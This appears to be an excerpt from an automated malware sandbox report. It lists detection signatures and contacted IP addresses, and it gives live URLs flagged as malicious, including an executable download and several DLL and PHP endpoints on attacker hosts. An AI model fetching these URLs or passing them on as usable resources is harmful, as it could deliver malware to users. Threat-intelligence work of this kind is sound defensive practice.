147.45.47.155, 49719, 49720, 49721 FREE-NET-ASFREEnetEU Russian Federation 31->49 51 Antivirus detection for dropped file 31->51 53 Detected unpacking (changes PE section rights) 31->53 55 Tries to detect sandboxes and other dynamic analysis tools (window names) 31->55 57 6 other signatures 31->57 signatures13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
147.45.47.155
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
77.91.77.81
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU false
85.28.47.4
 unknown Russian Federation
31643 GES-ASRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://77.91.77.81/mine/amadka.exe true
  • 27%, Virustotal, Browse
  • Avira URL Cloud: phishing
 unknown
http://147.45.47.155/ku4Nor9/index.php true
  • 21%, Virustotal, Browse
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.4/69934896f997d5bb/softokn3.dll true
  • 6%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/mozglue.dll true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/nss3.dll true
  • 9%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/vcruntime140.dll true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/freebl3.dll true
  • 6%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/920475a59bac849d.php true
  • 19%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/sqlite3.dll true
  • 21%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
85.28.47.4/920475a59bac849d.php true
  • 19%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/msvcp140.dll true
  • 9%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown